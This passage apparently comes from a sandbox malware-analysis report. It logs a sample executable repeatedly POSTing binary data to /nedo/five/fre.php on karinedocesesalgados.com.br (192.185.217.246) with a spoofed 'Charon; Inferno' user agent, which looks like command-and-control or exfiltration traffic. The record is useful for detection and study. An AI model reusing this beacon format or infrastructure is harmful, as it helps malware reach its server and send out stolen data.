                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:23.050029039 CET | 339 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:22 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                170 | 192.168.11.20 | 49957 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                171 | 192.168.11.20 | 49958 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                172 | 192.168.11.20 | 49959 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                173 | 192.168.11.20 | 49960 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                174 | 192.168.11.20 | 49961 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                175 | 192.168.11.20 | 49962 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                176 | 192.168.11.20 | 49963 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                177 | 192.168.11.20 | 49964 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                178 | 192.168.11.20 | 49965 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                179 | 192.168.11.20 | 49966 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                18 | 192.168.11.20 | 49805 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:23.755166054 CET | 339 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:24.056802034 CET | 340 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:23 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                180 | 192.168.11.20 | 49967 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                181 | 192.168.11.20 | 49968 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                182 | 192.168.11.20 | 49969 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                183 | 192.168.11.20 | 49970 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                184 | 192.168.11.20 | 49971 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                185 | 192.168.11.20 | 49972 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                186 | 192.168.11.20 | 49973 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                187 | 192.168.11.20 | 49974 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                188 | 192.168.11.20 | 49975 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                189 | 192.168.11.20 | 49976 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                19 | 192.168.11.20 | 49806 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:24.727797985 CET | 340 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:25.011589050 CET | 341 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:24 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                190 | 192.168.11.20 | 49977 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                191 | 192.168.11.20 | 49978 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                192 | 192.168.11.20 | 49979 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                193 | 192.168.11.20 | 49980 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                194 | 192.168.11.20 | 49981 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                195 | 192.168.11.20 | 49982 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                196 | 192.168.11.20 | 49983 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                197 | 192.168.11.20 | 49984 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                198 | 192.168.11.20 | 49985 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                199 | 192.168.11.20 | 49986 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe


                                Session ID  Source IP      Source Port  Destination IP   Destination Port  Process
                                2           192.168.11.20  49789        192.185.217.246  80                C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp                            kBytes transferred  Direction  Data
                                Nov 22, 2021 15:29:07.797027111 CET  314                 OUT        POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 3211
                                Connection: close
                                Nov 22, 2021 15:29:08.094770908 CET  318                 IN         HTTP/1.1 404 Not Found
                                Date: Mon, 22 Nov 2021 14:29:07 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 15
                                Content-Type: text/html
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID  Source IP      Source Port  Destination IP   Destination Port  Process
                                20          192.168.11.20  49807        192.185.217.246  80                C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp                            kBytes transferred  Direction  Data
                                Nov 22, 2021 15:29:25.681197882 CET  342                 OUT        POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:25.973185062 CET  342                 IN         HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:25 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID  Source IP      Source Port  Destination IP   Destination Port  Process
                                21          192.168.11.20  49808        192.185.217.246  80                C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp                            kBytes transferred  Direction  Data
                                Nov 22, 2021 15:29:26.756022930 CET  343                 OUT        POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:27.049078941 CET  344                 IN         HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:26 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID  Source IP      Source Port  Destination IP   Destination Port  Process
                                22          192.168.11.20  49809        192.185.217.246  80                C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp                            kBytes transferred  Direction  Data
                                Nov 22, 2021 15:29:27.791623116 CET  344                 OUT        POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:28.087519884 CET  345                 IN         HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:27 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID  Source IP      Source Port  Destination IP   Destination Port  Process
                                23          192.168.11.20  49810        192.185.217.246  80                C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp                            kBytes transferred  Direction  Data
                                Nov 22, 2021 15:29:28.696367979 CET  346                 OUT        POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:28.990336895 CET  346                 IN         HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:28 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID  Source IP      Source Port  Destination IP   Destination Port  Process
                                24          192.168.11.20  49811        192.185.217.246  80                C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp                            kBytes transferred  Direction  Data
                                Nov 22, 2021 15:29:29.657840014 CET  347                 OUT        POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:29.970290899 CET  347                 IN         HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:29 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID  Source IP      Source Port  Destination IP   Destination Port  Process
                                25          192.168.11.20  49812        192.185.217.246  80                C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp                            kBytes transferred  Direction  Data
                                Nov 22, 2021 15:29:30.622632027 CET  348                 OUT        POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:30.920140982 CET  349                 IN         HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:30 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID  Source IP      Source Port  Destination IP   Destination Port  Process
                                26          192.168.11.20  49813        192.185.217.246  80                C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp                            kBytes transferred  Direction  Data
                                Nov 22, 2021 15:29:31.575959921 CET  349                 OUT        POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:31.868001938 CET  350                 IN         HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:31 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                27 | 192.168.11.20 | 49814 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:32.498085976 CET | 351 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:32.784888983 CET | 351 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:32 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                270 | 192.168.11.20 | 50057 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                271 | 192.168.11.20 | 50058 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                272 | 192.168.11.20 | 50059 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                273 | 192.168.11.20 | 50060 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                274 | 192.168.11.20 | 50061 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                275 | 192.168.11.20 | 50062 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                276 | 192.168.11.20 | 50063 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                277 | 192.168.11.20 | 50064 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                278 | 192.168.11.20 | 50065 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                279 | 192.168.11.20 | 50066 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                28 | 192.168.11.20 | 49815 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:33.425503969 CET | 352 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:33.749982119 CET | 352 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:33 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                280 | 192.168.11.20 | 50067 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                281 | 192.168.11.20 | 50068 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                282 | 192.168.11.20 | 50069 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                283 | 192.168.11.20 | 50070 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                284 | 192.168.11.20 | 50071 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                285 | 192.168.11.20 | 50072 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                286 | 192.168.11.20 | 50073 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                287 | 192.168.11.20 | 50074 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                288 | 192.168.11.20 | 50075 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                289 | 192.168.11.20 | 50076 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                29 | 192.168.11.20 | 49816 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:34.289947033 CET | 353 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:34.608282089 CET | 354 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:34 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                290 | 192.168.11.20 | 50077 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                291 | 192.168.11.20 | 50078 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                292 | 192.168.11.20 | 50079 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                293 | 192.168.11.20 | 50080 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                294 | 192.168.11.20 | 50081 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                295 | 192.168.11.20 | 50082 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                296 | 192.168.11.20 | 50083 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                297 | 192.168.11.20 | 50084 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                298 | 192.168.11.20 | 50085 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                299 | 192.168.11.20 | 50086 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                3 | 192.168.11.20 | 49790 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:08.696327925 CET | 319 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:09.009121895 CET | 319 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:08 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                30 | 192.168.11.20 | 49817 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:35.268440008 CET | 354 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:35.589385986 CET | 355 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:35 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                300 | 192.168.11.20 | 50087 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                301 | 192.168.11.20 | 50088 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                302 | 192.168.11.20 | 50089 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                303 | 192.168.11.20 | 50090 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                304 | 192.168.11.20 | 50091 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                305 | 192.168.11.20 | 50092 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                306 | 192.168.11.20 | 50093 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                307 | 192.168.11.20 | 50094 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                308 | 192.168.11.20 | 50095 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                309 | 192.168.11.20 | 50096 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                31 | 192.168.11.20 | 49818 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:36.276251078 CET | 356 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:36.588426113 CET | 356 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:36 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                310 | 192.168.11.20 | 50097 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                311 | 192.168.11.20 | 50098 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                312 | 192.168.11.20 | 50099 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                313 | 192.168.11.20 | 50100 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                314 | 192.168.11.20 | 50101 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                315 | 192.168.11.20 | 50102 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                316 | 192.168.11.20 | 50103 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                317 | 192.168.11.20 | 50104 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                318 | 192.168.11.20 | 50105 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                319 | 192.168.11.20 | 50106 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                32 | 192.168.11.20 | 49819 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:37.248907089 CET | 357 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:37.568229914 CET | 357 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:37 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                320 | 192.168.11.20 | 50107 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                321 | 192.168.11.20 | 50108 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                322 | 192.168.11.20 | 50109 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                323 | 192.168.11.20 | 50110 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                324 | 192.168.11.20 | 50111 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                325 | 192.168.11.20 | 50112 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                326 | 192.168.11.20 | 50113 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                327 | 192.168.11.20 | 50114 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                328 | 192.168.11.20 | 50115 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                329 | 192.168.11.20 | 50116 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                33 | 192.168.11.20 | 49820 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:38.193336010 CET | 358 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:38.507232904 CET | 359 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:38 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                330 | 192.168.11.20 | 50117 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                331 | 192.168.11.20 | 50118 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                332 | 192.168.11.20 | 50119 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
